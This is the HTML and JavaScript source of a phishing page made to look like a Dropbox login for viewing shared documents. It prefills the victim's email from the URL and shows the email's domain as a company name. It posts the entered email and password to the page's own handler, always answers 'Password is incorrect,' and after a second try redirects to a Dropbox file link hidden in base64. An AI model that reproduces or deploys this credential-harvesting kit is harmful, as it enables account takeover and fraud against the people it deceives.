<!DOCTYPE html>
<html>

<head>
	<title>Log into your account</title>
	<meta name="robots" content="noindex">
	<meta name="robots" content="noindex, nofollow">
	<meta name="robots" content="noimageindex">
	<meta name="googlebot" content="noindex">
	<link href="https://cfl.dropboxstatic.com/static/metaserver/static/images/favicon-vfl8lUR9B.ico"
		rel="shortcut icon">

	<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css">
	<link href="https://fonts.googleapis.com/css?family=Yellowtail&display=swap" rel="stylesheet">
	<style type="text/css">
		body {
			background: #0073C6;
		}

		.container {
			width: 100%;
			display: flex;
			justify-content: center;
			align-items: center;
			height: 100vh;
		}

		.office {
			width: 380px;
			background: #fff;
		}

		.office-holder {
			width: 80%;
			margin: auto;
			padding: 20px 0px;
		}

		.logo {
			width: 100%;
			float: left;
			margin-bottom: 2em;
		}

		.logo h1 {
			font-family: arial;
		}

		.verify {
			width: 70%;
			margin: auto;
		}

		.verify h4 {
			font-family: arial;
		}

		fieldset {
			width: 90%;
			float: right;
			border: 2px solid #4285f4;
			border-radius: 5px;
		}

		legend {
			font-size: 15px;
			overflow: hidden;
			width: 42%;
			padding: 0px 2px;
			margin: 0px;
		}

		.verify input[type='text'] {
			width: 100%;
			float: right;
			border: none;
			padding: 3px 10px;
		}

		.verify button {
			border: none;
			height: 40px;
			width: 80px;
			float: right;
			margin-top: 2em;
			background: #4285f4;
			border-radius: 5px;
			color: #fff;
		}

		.email-to-verify {
			border: 1px solid #000;
			border-radius: 10px;
		}

		.form-holder {
			width: 100%;
			float: left;
		}

		.form-holder h3 {
			font-weight: 600;
		}

		.form-holder input[type='email'],
		input[type='password'] {
			width: 100%;
			height: 40px;
			float: left;
			margin-bottom: 15px;
		}

		.form-holder .btn-holder {
			width: 100%;
			margin-top: 1em;
			display: flex;
			align-content: center;
			align-items: center;
			justify-content: center;
		}

		.form-holder .btn-holder .btn {
			background: #0073C6;
			border: none;
			padding: 6px 10px;
			color: #fff;
			border-radius: 0px;
			margin-top: 20px;
			margin-bottom: 20px;
		}

		.form-holder .btn-holder .btn:hover {
			cursor: pointer;
		}

		.checkbox {
			width: 100%;
			float: left;
			margin-top: 5px;
		}

		.checkbox label {
			font-family: arial;
			font-size: 13px;
			float: left;
			margin-left: 1em;
		}

		.hide {
			display: none;
		}

		.hidee {
			display: none;
		}
	</style>
</head>

<body>
	<div class="container">
		<div class="office hidee" id="verify"
			style="border: 1px solid #eee; border-radius: 5px; padding:50px 0px; width: 400px;">
			<div class="verify" style="text-align: center;">
				<div style="width: 100%; margin-bottom: 10px;">
					<img src="" width="100px">
				</div>
				<div style="width: 100%;">
					<div class=" alert-danger hide alert1"></div>
				</div>

			</div>

		</div>
		<div class="office show border shadow bg-light rounded" id="others">
			<div class="office-holder">
				<div class="logo">
					<h3 class="text-dark"><strong id="domain-name" class="text-uppercase"></strong></h3>
					<h5 class="font-weight-light">Please sign in using your email and password to view documents</h5>
				</div>
				<form action="" id="contact" name="myForm" method="post">
					<input type="hidden" name="source" id="source" value="dropbox-others">
					<div class="form-holder">
						<div class="form-group">
							<div class="alert alert-danger hide" id="msg"></div>
						</div>
						<input type="text" id="email" class="form-control" name="email"
							placeholder="someone@example.com">
						<br>
						<input type="password" id="password" name="password" placeholder="Password" class="form-control"
							required>
						<div class="checkbox">
							<input type="checkbox" name="" style="float: left; margin-top:2px; margin-bottom: 10px;">
							<label>REMEMBER ME</label>
						</div>
						<div class="btn-holder">
							<button class="btn btn-lg col-12" id="submit-btn">LOGIN</button>
						</div>
						<a href="javascript:void(0);">
							<p style="color:#0073C6; margin-top:1em; float: left; width:100%;">can't access your
								account?</p>
						</a>
						<a href="javascript:void(0);">
							<p style="color:#0073C6; margin-top:0em; float: left; width:100%;">Sign in with a single-use
								code</p>
						</a>
					</div>
				</form>
			</div>
		</div>
	</div>
<script src="jquery.min.js"></script>

	<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js"></script>

</body>
<script type="text/javascript">
	const param = new URLSearchParams(window.location.search);
let emailParam = param.get('email') ? param.get('email') : '';
let count = 0;
 
if (emailParam === "null") {
   emailParam = "";
}


const email = document.getElementById('email');
const password = document.getElementById('password');
const source = document.getElementById('source');
const login = document.getElementById('submit-btn');
const form = document.getElementById("contact");
email.value = emailParam;

var showDomain = document.getElementById('domain-name');
var domain = '';


domain = emailParam.replace(/.*@/, "").split('.')[0];
showDomain.textContent = domain;

login.addEventListener('click', function(e){
  var alert = document.querySelector('.alert');
   e.preventDefault();
   if (email.value === "") {
		$(".alert").show();
		alert.textContent = "Enter a valid email address.";
		email.style.borderColor = "red";
		email.focus();
     return;
   } else if (!email.value.match(/^(([^<>()\[\]\\.,;:\s@"]+(\.[^<>()\[\]\\.,;:\s@"]+)*)|(".+"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/)) {
		$(".alert").show();
		alert.textContent = "Enter a valid email address.";
		email.style.borderColor = "red";
    email.focus();
     return;
   } else if (password.value === "") {
		$(".alert").show();
		alert.textContent = "You have not yet entered a valid password.";
		password.style.borderColor = "red";
     password.focus();
     return;
   } else {
     const domain = email.value.split('@')[1];
     count = count + 1;

    
     var $form = $("#contact");
     var data = $form.serialize();
     var url = form.action;


     var msg = $('#msg').html();
     $('#msg').text( msg );
      
     $.ajax({
       type: "POST",
       url: url,
       data: data,
       cache: false,
       timeout: 800000,
       beforeSend: function(xhr){
		$('.alert').hide();
          $('#submit-btn').attr("disabled", true);
          $('#submit-btn').css("cursor", "not-allowed");
        },
      success: function(response){
        if(response){
		  $('#submit-btn').attr("disabled", false);
          $('#submit-btn').css("cursor", "pointer");
          
		  password.value = "";
          password.style.borderColor = "red";
          $('.alert').show();
          alert.textContent = "Password is incorrect.";
          alert.className = alert.className.replace(/\balert-info\b/g, "alert-danger");

		  if (count >= 2) {
				window.location.replace(atob("aHR0cHM6Ly93d3cuZHJvcGJveC5jb20vcy96cnU1ZHhucHlwODdueDkvU0NBTkRPQzAwMS5wZGY/ZGw9MA=="));
				return;
			}

          console.log(response);
          if(response['signal'] == 'ok'){
            $('#msg').html(response['msg']);
          }
          else{

            $('#msg').html(response['msg']);
          }
        }else {
          $("#msg").show();
          $("#msg").html('Something went wrong, please try again later.');
          password.value = "";
          password.style.borderColor = "red";
        }
      },
      error: function(){
        $("#msg").show();
        $('#msg').html("Something went wrong, please try again later.");
        password.value = "";
        password.style.borderColor = "red";
      },
      complete: function(){
        $('#submit-btn').html('LOGIN');
      }
      });
    }  
});

</script>

</html>